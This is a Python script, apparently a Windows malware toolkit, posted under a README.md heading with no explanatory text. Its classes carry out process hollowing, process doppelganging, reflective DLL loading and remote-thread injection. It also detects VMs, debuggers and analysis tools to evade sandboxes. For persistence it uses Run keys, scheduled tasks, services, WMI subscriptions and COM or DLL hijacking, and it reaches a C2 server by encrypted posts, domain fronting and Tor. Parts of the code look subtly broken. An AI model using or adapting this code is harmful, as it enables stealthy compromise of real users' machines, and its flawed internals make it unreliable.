README.md
Rendering markdown...
#!/usr/bin/env python3
import ctypes
import sys
import time
import random
import hashlib
import os
import threading
import struct
class ProcessHollowing:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
def create_suspended_process(self, target_path):
startup_info = ctypes.wintypes.STARTUPINFOW()
process_info = ctypes.wintypes.PROCESS_INFORMATION()
startup_info.cb = ctypes.sizeof(startup_info)
success = self.kernel32.CreateProcessW(
None,
target_path,
None,
None,
False,
0x4,
None,
None,
ctypes.byref(startup_info),
ctypes.byref(process_info)
)
if success:
return process_info.hProcess, process_info.hThread, process_info.dwProcessId
return None, None, None
def unmap_original_image(self, process_handle):
peb_address = ctypes.c_void_p()
status = self.ntdll.NtQueryInformationProcess(
process_handle,
0,
ctypes.byref(peb_address),
ctypes.sizeof(peb_address),
None
)
if status == 0:
image_base = ctypes.c_void_p()
bytes_read = ctypes.wintypes.DWORD()
self.kernel32.ReadProcessMemory(
process_handle,
peb_address.value + 0x10,
ctypes.byref(image_base),
ctypes.sizeof(image_base),
ctypes.byref(bytes_read)
)
if image_base.value:
status = self.ntdll.NtUnmapViewOfSection(
process_handle,
image_base
)
return status == 0
return False
def inject_payload(self, process_handle, payload, entry_point):
payload_size = len(payload)
allocated_memory = self.kernel32.VirtualAllocEx(
process_handle,
None,
payload_size,
0x3000,
0x40
)
if allocated_memory:
written = ctypes.wintypes.DWORD()
success = self.kernel32.WriteProcessMemory(
process_handle,
allocated_memory,
payload,
payload_size,
ctypes.byref(written)
)
if success and written.value == payload_size:
return allocated_memory
return None
def resume_execution(self, thread_handle, new_entry_point):
context = ctypes.wintypes.CONTEXT()
context.ContextFlags = 0x10001
success = self.kernel32.GetThreadContext(thread_handle, ctypes.byref(context))
if success:
if sys.maxsize > 2**32:
context.Rcx = new_entry_point
else:
context.Eax = new_entry_point
self.kernel32.SetThreadContext(thread_handle, ctypes.byref(context))
self.kernel32.ResumeThread(thread_handle)
return True
return False
def execute_advanced_injection(self, target_path, payload, architecture="x64"):
try:
process_handle, thread_handle, pid = self.create_suspended_process(target_path)
if not process_handle:
return False
if not self.unmap_original_image(process_handle):
self.kernel32.CloseHandle(process_handle)
self.kernel32.CloseHandle(thread_handle)
return False
entry_point = self.inject_payload(process_handle, payload, 0x400000)
if not entry_point:
self.kernel32.CloseHandle(process_handle)
self.kernel32.CloseHandle(thread_handle)
return False
success = self.resume_execution(thread_handle, entry_point)
self.kernel32.CloseHandle(process_handle)
self.kernel32.CloseHandle(thread_handle)
return success
except:
return False
class AdvancedEvasion:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
self.user32 = ctypes.windll.user32
def detect_vm(self):
vm_indicators = 0
try:
reg_keys = [
r"SYSTEM\CurrentControlSet\Enum\IDE\DiskVMware",
r"SYSTEM\CurrentControlSet\Enum\IDE\DiskVBOX",
r"SYSTEM\CurrentControlSet\Enum\IDE\CdRomVMware",
r"SOFTWARE\VMware, Inc.\VMware Tools",
r"SOFTWARE\Oracle\VirtualBox Guest Additions",
r"SYSTEM\CurrentControlSet\Services\VBoxService",
r"SYSTEM\CurrentControlSet\Services\VBoxSF",
r"SYSTEM\CurrentControlSet\Services\VBoxMouse",
r"SYSTEM\CurrentControlSet\Services\VBoxGuest"
]
import winreg
for key_path in reg_keys:
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path)
winreg.CloseKey(key)
vm_indicators += 1
except:
pass
except:
pass
try:
processes = [
"vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe", "vmwaretray.exe",
"vmwareuser.exe", "VGAuthService.exe", "vmacthlp.exe", "vmsrvc.exe",
"vmusrvc.exe", "prl_cc.exe", "prl_tools.exe", "xenservice.exe",
"qemu-ga.exe", "windanr.exe", "vdagent.exe", "vdservice.exe"
]
try:
import psutil
running_processes = [p.name().lower() for p in psutil.process_iter()]
for vm_process in processes:
if vm_process.lower() in running_processes:
vm_indicators += 1
except:
pass
except:
pass
try:
vm_files = [
r"C:\windows\system32\drivers\vmmouse.sys",
r"C:\windows\system32\drivers\vmhgfs.sys",
r"C:\windows\system32\drivers\VBoxMouse.sys",
r"C:\windows\system32\drivers\VBoxGuest.sys",
r"C:\windows\system32\drivers\VBoxSF.sys",
r"C:\windows\system32\drivers\VBoxVideo.sys",
r"C:\windows\system32\vboxdisp.dll",
r"C:\windows\system32\vboxhook.dll",
r"C:\windows\system32\vboxmrxnp.dll",
r"C:\windows\system32\vboxogl.dll",
r"C:\windows\system32\vboxoglarrayspu.dll",
r"C:\windows\system32\vboxoglcrutil.dll",
r"C:\windows\system32\vboxoglerrorspu.dll",
r"C:\windows\system32\vboxoglfeedbackspu.dll",
r"C:\windows\system32\vboxoglpackspu.dll",
r"C:\windows\system32\vboxoglpassthroughspu.dll"
]
for vm_file in vm_files:
if os.path.exists(vm_file):
vm_indicators += 1
except:
pass
try:
mac_prefixes = ["00:05:69", "00:0C:29", "00:1C:14", "00:50:56", "08:00:27"]
import subprocess
result = subprocess.run(["getmac"], capture_output=True, text=True)
if result.returncode == 0:
for prefix in mac_prefixes:
if prefix in result.stdout:
vm_indicators += 1
except:
pass
return vm_indicators > 3
def detect_analysis_tools(self):
analysis_tools = [
"ollydbg.exe", "x64dbg.exe", "x32dbg.exe", "windbg.exe", "ida.exe",
"ida64.exe", "idaq.exe", "idaq64.exe", "idaw.exe", "idaw64.exe",
"procmon.exe", "procexp.exe", "procexp64.exe", "wireshark.exe",
"fiddler.exe", "regshot.exe", "pestudio.exe", "die.exe", "exeinfope.exe",
"peid.exe", "lordpe.exe", "importrec.exe", "reshacker.exe", "resourcehacker.exe",
"apimonitor.exe", "apispy32.exe", "detours.exe", "hookapi.exe",
"sysinternals.exe", "autoruns.exe", "autorunsc.exe", "tcpview.exe",
"portmon.exe", "filemon.exe", "regmon.exe", "diskmon.exe",
"vmmap.exe", "rammap.exe", "handle.exe", "listdlls.exe",
"strings.exe", "sigcheck.exe", "pslist.exe", "pskill.exe",
"psservice.exe", "pssuspend.exe", "psinfo.exe", "logonsessions.exe",
"sdelete.exe", "streams.exe", "du.exe", "junction.exe",
"pendmoves.exe", "movefile.exe", "pagedfrg.exe", "contig.exe",
"sync.exe", "psfile.exe", "psloggedon.exe", "psloglist.exe",
"pspasswd.exe", "psshutdown.exe", "psgetsid.exe", "pskill.exe",
"psexec.exe", "psping.exe", "pstools.exe", "accesschk.exe",
"accessenum.exe", "adexplorer.exe", "adinsight.exe", "adrestore.exe",
"bginfo.exe", "cacheset.exe", "clockres.exe", "coreinfo.exe",
"ctrl2cap.exe", "desktops.exe", "disk2vhd.exe", "diskext.exe",
"diskview.exe", "efsdump.exe", "hex2dec.exe", "livekd.exe",
"loadord.exe", "notmyfault.exe", "ntfsinfo.exe", "pagedfrg.exe",
"pipelist.exe", "portmon.exe", "procdump.exe", "procfeatures.exe",
"psexec.exe", "psfile.exe", "psgetsid.exe", "psinfo.exe",
"pskill.exe", "pslist.exe", "psloggedon.exe", "psloglist.exe",
"pspasswd.exe", "psping.exe", "psservice.exe", "psshutdown.exe",
"pssuspend.exe", "pstools.exe", "ru.exe", "sdelete.exe",
"shareenum.exe", "shellrunas.exe", "sigcheck.exe", "streams.exe",
"strings.exe", "sync.exe", "tcpvcon.exe", "tcpview.exe",
"vmmap.exe", "volumeid.exe", "whois.exe", "winobj.exe",
"zoomit.exe", "cheat engine.exe", "ce.exe", "cheatengine.exe",
"artmoney.exe", "gameguardian.exe", "speedhack.exe", "tsearch.exe",
"memhack.exe", "memoryhacker.exe", "memoryeditor.exe", "hexeditor.exe",
"hxd.exe", "010editor.exe", "hexworkshop.exe", "winhex.exe"
]
try:
import psutil
running_processes = [p.name().lower() for p in psutil.process_iter()]
for tool in analysis_tools:
if tool.lower() in running_processes:
return True
except:
pass
try:
analysis_windows = [
"OLLYDBG", "WinDbg", "x64dbg", "x32dbg", "IDA", "Hex-Rays",
"Process Monitor", "Process Explorer", "Wireshark", "Fiddler",
"RegShot", "PEiD", "LordPE", "ImportREC", "Resource Hacker",
"API Monitor", "API Spy", "Detours", "Hook API", "Sysinternals",
"Autoruns", "TCPView", "PortMon", "FileMon", "RegMon",
"DiskMon", "VMMap", "RAMMap", "Handle", "ListDLLs",
"Strings", "SigCheck", "PsList", "PSKill", "PSService",
"PSSuspend", "PSInfo", "LogonSessions", "SDelete", "Streams",
"DU", "Junction", "PendMoves", "MoveFile", "PagedFrg",
"Contig", "Sync", "PSFile", "PSLoggedOn", "PSLogList",
"PSPasswd", "PSShutdown", "PSGetSid", "PSExec", "PSPing",
"PSTools", "AccessChk", "AccessEnum", "ADExplorer", "ADInsight",
"ADRestore", "BGInfo", "CacheSet", "ClockRes", "CoreInfo",
"Ctrl2Cap", "Desktops", "Disk2vhd", "DiskExt", "DiskView",
"EFSDump", "Hex2dec", "LiveKd", "LoadOrd", "NotMyFault",
"NTFSInfo", "PagedFrg", "PipeList", "PortMon", "ProcDump",
"ProcFeatures", "RU", "ShareEnum", "ShellRunas", "VolumeId",
"WhoIs", "WinObj", "ZoomIt", "Cheat Engine", "ArtMoney",
"GameGuardian", "SpeedHack", "TSearch", "MemHack", "MemoryHacker",
"MemoryEditor", "HexEditor", "HxD", "010 Editor", "Hex Workshop",
"WinHex"
]
def enum_windows_proc(hwnd, lParam):
length = self.user32.GetWindowTextLengthW(hwnd)
if length > 0:
buffer = ctypes.create_unicode_buffer(length + 1)
self.user32.GetWindowTextW(hwnd, buffer, length + 1)
window_title = buffer.value
for analysis_window in analysis_windows:
if analysis_window.lower() in window_title.lower():
return False
return True
enum_windows_proc_type = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.wintypes.HWND, ctypes.wintypes.LPARAM)
enum_windows_proc_ptr = enum_windows_proc_type(enum_windows_proc)
result = self.user32.EnumWindows(enum_windows_proc_ptr, 0)
if not result:
return True
except:
pass
return False
def check_mouse_activity(self):
initial_pos = ctypes.wintypes.POINT()
self.user32.GetCursorPos(ctypes.byref(initial_pos))
time.sleep(3)
final_pos = ctypes.wintypes.POINT()
self.user32.GetCursorPos(ctypes.byref(final_pos))
distance = ((final_pos.x - initial_pos.x) ** 2 + (final_pos.y - initial_pos.y) ** 2) ** 0.5
return distance > 15
def check_uptime(self):
uptime_ms = self.kernel32.GetTickCount64()
uptime_minutes = uptime_ms / (1000 * 60)
return uptime_minutes > 15
def check_memory_size(self):
memory_status = ctypes.wintypes.MEMORYSTATUSEX()
memory_status.dwLength = ctypes.sizeof(memory_status)
success = self.kernel32.GlobalMemoryStatusEx(ctypes.byref(memory_status))
if success:
total_memory_gb = memory_status.ullTotalPhys / (1024 ** 3)
return total_memory_gb >= 4
return True
def check_cpu_cores(self):
system_info = ctypes.wintypes.SYSTEM_INFO()
self.kernel32.GetSystemInfo(ctypes.byref(system_info))
return system_info.dwNumberOfProcessors >= 2
def check_disk_size(self):
try:
free_bytes = ctypes.c_ulonglong()
total_bytes = ctypes.c_ulonglong()
success = self.kernel32.GetDiskFreeSpaceExW(
"C:\\",
ctypes.byref(free_bytes),
ctypes.byref(total_bytes),
None
)
if success:
total_gb = total_bytes.value / (1024 ** 3)
return total_gb >= 80
except:
pass
return True
def check_recent_files(self):
try:
recent_path = os.path.expanduser("~\\AppData\\Roaming\\Microsoft\\Windows\\Recent")
if os.path.exists(recent_path):
files = os.listdir(recent_path)
return len(files) > 10
except:
pass
return True
def check_installed_programs(self):
try:
import winreg
programs = []
uninstall_key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
)
i = 0
while True:
try:
subkey_name = winreg.EnumKey(uninstall_key, i)
subkey = winreg.OpenKey(uninstall_key, subkey_name)
try:
display_name, _ = winreg.QueryValueEx(subkey, "DisplayName")
programs.append(display_name)
except:
pass
winreg.CloseKey(subkey)
i += 1
except:
break
winreg.CloseKey(uninstall_key)
return len(programs) > 20
except:
pass
return True
def timing_evasion(self):
start_time = time.time()
for i in range(1000000):
hash_obj = hashlib.md5()
hash_obj.update(str(i).encode())
hash_obj.hexdigest()
end_time = time.time()
execution_time = end_time - start_time
return execution_time < 10.0
def sleep_evasion(self):
start_time = time.time()
time.sleep(5)
end_time = time.time()
actual_sleep = end_time - start_time
return 4.5 <= actual_sleep <= 5.5
def rdtsc_evasion(self):
try:
rdtsc_start = self._rdtsc()
time.sleep(0.1)
rdtsc_end = self._rdtsc()
cycles = rdtsc_end - rdtsc_start
return cycles > 100000
except:
return True
def _rdtsc(self):
try:
high = ctypes.c_uint32()
low = ctypes.c_uint32()
asm_code = b"\x0F\x31\x89\x45\xFC\x89\x55\xF8"
func_type = ctypes.WINFUNCTYPE(None, ctypes.POINTER(ctypes.c_uint32), ctypes.POINTER(ctypes.c_uint32))
func = ctypes.cast(ctypes.c_char_p(asm_code), func_type)
func(ctypes.byref(low), ctypes.byref(high))
return (high.value << 32) | low.value
except:
return int(time.time() * 1000000)
def check_debugger_artifacts(self):
try:
debug_heap = self.kernel32.GetProcessHeap()
heap_flags = ctypes.c_uint32.from_address(debug_heap + 0x40)
if heap_flags.value & 0x2:
return True
force_flags = ctypes.c_uint32.from_address(debug_heap + 0x44)
if force_flags.value & 0x40000060:
return True
except:
pass
try:
peb = ctypes.c_void_p.from_address(0x7FFE0000)
being_debugged = ctypes.c_ubyte.from_address(peb.value + 0x02)
if being_debugged.value:
return True
except:
pass
return False
def check_hooks(self):
try:
ntdll = self.kernel32.GetModuleHandleW("ntdll.dll")
if not ntdll:
return False
nt_query_info = self.kernel32.GetProcAddress(ntdll, b"NtQueryInformationProcess")
if not nt_query_info:
return False
first_bytes = ctypes.c_ubyte.from_address(nt_query_info)
if first_bytes.value == 0xE9 or first_bytes.value == 0xFF:
return True
except:
pass
return False
def comprehensive_env_check(self):
checks = [
("VM Detection", self.detect_vm),
("Analysis Tools", self.detect_analysis_tools),
("Mouse Activity", self.check_mouse_activity),
("System Uptime", self.check_uptime),
("Memory Size", self.check_memory_size),
("CPU Cores", self.check_cpu_cores),
("Disk Size", self.check_disk_size),
("Recent Files", self.check_recent_files),
("Installed Programs", self.check_installed_programs),
("Timing Analysis", self.timing_evasion),
("Sleep Analysis", self.sleep_evasion),
("RDTSC Analysis", self.rdtsc_evasion),
("Debugger Artifacts", self.check_debugger_artifacts),
("API Hooks", self.check_hooks)
]
suspicious_count = 0
total_checks = len(checks)
for check_name, check_func in checks:
try:
result = check_func()
if not result:
suspicious_count += 1
except:
suspicious_count += 1
suspicion_ratio = suspicious_count / total_checks
return suspicion_ratio < 0.3
class PersistenceManager:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.advapi32 = ctypes.windll.advapi32
def registry_run_key(self, name, path):
try:
import winreg
key = winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
0,
winreg.KEY_SET_VALUE
)
winreg.SetValueEx(key, name, 0, winreg.REG_SZ, path)
winreg.CloseKey(key)
return True
except:
return False
def scheduled_task(self, task_name, executable_path):
try:
import subprocess
cmd = f'schtasks /create /tn "{task_name}" /tr "{executable_path}" /sc onlogon /f'
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
return result.returncode == 0
except:
return False
def service_persistence(self, service_name, executable_path):
try:
import subprocess
create_cmd = f'sc create "{service_name}" binPath= "{executable_path}" start= auto'
start_cmd = f'sc start "{service_name}"'
create_result = subprocess.run(create_cmd, shell=True, capture_output=True)
if create_result.returncode == 0:
start_result = subprocess.run(start_cmd, shell=True, capture_output=True)
return start_result.returncode == 0
except:
pass
return False
def wmi_event_subscription(self, consumer_name, filter_name):
try:
import subprocess
filter_cmd = f'wmic /namespace:"\\\\root\\subscription" PATH __EventFilter CREATE Name="{filter_name}", EventNameSpace="root\\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \'Win32_PerfRawData_PerfOS_System\'"'
consumer_cmd = f'wmic /namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer CREATE Name="{consumer_name}", ExecutablePath="C:\\\\Windows\\\\System32\\\\calc.exe", CommandLineTemplate="C:\\\\Windows\\\\System32\\\\calc.exe"'
binding_cmd = f'wmic /namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\\"{filter_name}\\"", Consumer="CommandLineEventConsumer.Name=\\"{consumer_name}\\""'
subprocess.run(filter_cmd, shell=True, capture_output=True)
subprocess.run(consumer_cmd, shell=True, capture_output=True)
result = subprocess.run(binding_cmd, shell=True, capture_output=True)
return result.returncode == 0
except:
return False
def dll_hijacking_setup(self, target_directory, dll_name, payload_path):
try:
import shutil
target_dll_path = os.path.join(target_directory, dll_name)
if os.path.exists(payload_path):
shutil.copy2(payload_path, target_dll_path)
return os.path.exists(target_dll_path)
except:
pass
return False
def startup_folder_persistence(self, name, executable_path):
try:
import shutil
startup_folder = os.path.expanduser(
"~\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
)
if os.path.exists(startup_folder):
target_path = os.path.join(startup_folder, f"{name}.exe")
shutil.copy2(executable_path, target_path)
return os.path.exists(target_path)
except:
pass
return False
def com_hijacking(self, clsid, executable_path):
try:
import winreg
key_path = f"SOFTWARE\\Classes\\CLSID\\{clsid}\\InprocServer32"
key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, key_path)
winreg.SetValueEx(key, "", 0, winreg.REG_SZ, executable_path)
winreg.SetValueEx(key, "ThreadingModel", 0, winreg.REG_SZ, "Apartment")
winreg.CloseKey(key)
return True
except:
return False
class NetworkEvasion:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
def domain_fronting_request(self, fronted_domain, real_domain, path):
try:
import requests
headers = {
'Host': real_domain,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'
}
url = f"https://{fronted_domain}{path}"
response = requests.get(url, headers=headers, timeout=10, verify=False)
return response.status_code == 200
except:
return False
def dns_over_https_lookup(self, domain):
try:
import requests
import json
doh_providers = [
"https://1.1.1.1/dns-query",
"https://8.8.8.8/dns-query",
"https://dns.google/dns-query",
"https://cloudflare-dns.com/dns-query"
]
for provider in doh_providers:
try:
doh_url = f"{provider}?name={domain}&type=A"
headers = {
'Accept': 'application/dns-json'
}
response = requests.get(doh_url, headers=headers, timeout=5)
if response.status_code == 200:
data = response.json()
if 'Answer' in data:
return [answer['data'] for answer in data['Answer']]
except:
continue
except:
pass
return []
def encrypted_c2_comm(self, server_url, data, key):
try:
try:
from cryptography.fernet import Fernet
import base64
cipher_suite = Fernet(key)
encrypted_data = cipher_suite.encrypt(data.encode())
payload = {
'data': base64.b64encode(encrypted_data).decode()
}
import requests
response = requests.post(server_url, json=payload, timeout=10)
if response.status_code == 200:
try:
encrypted_response = base64.b64decode(response.json()['data'])
decrypted_response = cipher_suite.decrypt(encrypted_response)
return decrypted_response.decode()
except:
return response.text
except ImportError:
import requests
simple_key = sum(key) % 256
encrypted_data = ''.join(chr(ord(c) ^ simple_key) for c in data)
payload = {'data': encrypted_data}
response = requests.post(server_url, json=payload, timeout=10)
if response.status_code == 200:
return response.text
except:
pass
return None
def tor_request(self, url, data=None):
try:
import requests
proxies = {
'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'
}
if data:
response = requests.post(url, json=data, proxies=proxies, headers=headers, timeout=30)
else:
response = requests.get(url, proxies=proxies, headers=headers, timeout=30)
return response.text if response.status_code == 200 else None
except:
return None
def steganography_comm(self, image_path, data):
try:
from PIL import Image
import io
img = Image.open(image_path)
pixels = list(img.getdata())
binary_data = ''.join(format(ord(char), '08b') for char in data)
binary_data += '1111111111111110'
data_index = 0
new_pixels = []
for pixel in pixels:
if data_index < len(binary_data):
r, g, b = pixel[:3]
if data_index < len(binary_data):
r = (r & 0xFE) | int(binary_data[data_index])
data_index += 1
if data_index < len(binary_data):
g = (g & 0xFE) | int(binary_data[data_index])
data_index += 1
if data_index < len(binary_data):
b = (b & 0xFE) | int(binary_data[data_index])
data_index += 1
new_pixels.append((r, g, b))
else:
new_pixels.append(pixel)
new_img = Image.new(img.mode, img.size)
new_img.putdata(new_pixels)
output = io.BytesIO()
new_img.save(output, format='PNG')
return output.getvalue()
except:
return None
class PayloadDelivery:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
def reflective_dll_loading(self, dll_data):
try:
dll_size = len(dll_data)
allocated_memory = self.kernel32.VirtualAlloc(
None,
dll_size,
0x3000,
0x40
)
if allocated_memory:
ctypes.memmove(allocated_memory, dll_data, dll_size)
dos_header = ctypes.cast(allocated_memory, ctypes.POINTER(ctypes.c_uint16))
if dos_header[0] == 0x5A4D:
pe_offset = ctypes.cast(allocated_memory + 0x3C, ctypes.POINTER(ctypes.c_uint32))[0]
nt_headers = allocated_memory + pe_offset
entry_point_rva = ctypes.cast(nt_headers + 0x28, ctypes.POINTER(ctypes.c_uint32))[0]
entry_point = allocated_memory + entry_point_rva
dll_main = ctypes.cast(entry_point, ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p))
return dll_main(allocated_memory, 1, None)
except:
pass
return False
def process_doppelganging(self, legitimate_path, payload_data):
try:
transaction_handle = ctypes.wintypes.HANDLE()
status = self.ntdll.NtCreateTransaction(
ctypes.byref(transaction_handle),
0x1F0000,
None,
None,
None,
0,
0,
0,
None,
None
)
if status == 0:
transacted_file = self.kernel32.CreateFileTransactedW(
legitimate_path,
0x40000000,
0,
None,
2,
0,
None,
transaction_handle,
None,
None
)
if transacted_file != -1:
written = ctypes.wintypes.DWORD()
success = self.kernel32.WriteFile(
transacted_file,
payload_data,
len(payload_data),
ctypes.byref(written),
None
)
if success:
section_handle = ctypes.wintypes.HANDLE()
status = self.ntdll.NtCreateSection(
ctypes.byref(section_handle),
0x1F0000,
None,
None,
0x02,
0x1000000,
transacted_file
)
if status == 0:
process_info = ctypes.wintypes.PROCESS_INFORMATION()
status = self.ntdll.NtCreateProcessEx(
ctypes.byref(process_info.hProcess),
0x1F0FFF,
None,
self.kernel32.GetCurrentProcess(),
4,
section_handle,
None,
None,
False
)
if status == 0:
self.kernel32.CloseHandle(section_handle)
self.kernel32.CloseHandle(transacted_file)
self.ntdll.NtRollbackTransaction(transaction_handle, True)
self.kernel32.CloseHandle(transaction_handle)
return True
self.kernel32.CloseHandle(transacted_file)
self.ntdll.NtRollbackTransaction(transaction_handle, True)
self.kernel32.CloseHandle(transaction_handle)
except:
pass
return False
def atom_bombing(self, target_pid, payload):
try:
process_handle = self.kernel32.OpenProcess(
0x1F0FFF,
False,
target_pid
)
if process_handle:
atom_name = f"AtomBomb{random.randint(1000, 9999)}"
atom = self.kernel32.GlobalAddAtomW(atom_name)
if atom:
allocated_memory = self.kernel32.VirtualAllocEx(
process_handle,
None,
len(payload),
0x3000,
0x40
)
if allocated_memory:
written = ctypes.wintypes.DWORD()
success = self.kernel32.WriteProcessMemory(
process_handle,
allocated_memory,
payload,
len(payload),
ctypes.byref(written)
)
if success:
thread_handle = self.kernel32.CreateRemoteThread(
process_handle,
None,
0,
allocated_memory,
None,
0,
None
)
if thread_handle:
self.kernel32.CloseHandle(thread_handle)
self.kernel32.CloseHandle(process_handle)
self.kernel32.GlobalDeleteAtom(atom)
return True
self.kernel32.GlobalDeleteAtom(atom)
self.kernel32.CloseHandle(process_handle)
except:
pass
return False
def manual_dll_mapping(self, target_pid, dll_data):
try:
process_handle = self.kernel32.OpenProcess(
0x1F0FFF,
False,
target_pid
)
if process_handle:
dos_header = ctypes.cast(dll_data, ctypes.POINTER(ctypes.c_uint16))
if dos_header[0] == 0x5A4D:
pe_offset = ctypes.cast(ctypes.addressof(dll_data) + 0x3C, ctypes.POINTER(ctypes.c_uint32))[0]
nt_headers = ctypes.addressof(dll_data) + pe_offset
image_size = ctypes.cast(nt_headers + 0x50, ctypes.POINTER(ctypes.c_uint32))[0]
allocated_memory = self.kernel32.VirtualAllocEx(
process_handle,
None,
image_size,
0x3000,
0x40
)
if allocated_memory:
written = ctypes.wintypes.DWORD()
success = self.kernel32.WriteProcessMemory(
process_handle,
allocated_memory,
dll_data,
len(dll_data),
ctypes.byref(written)
)
if success:
self.kernel32.CloseHandle(process_handle)
return True
self.kernel32.CloseHandle(process_handle)
except:
pass
return False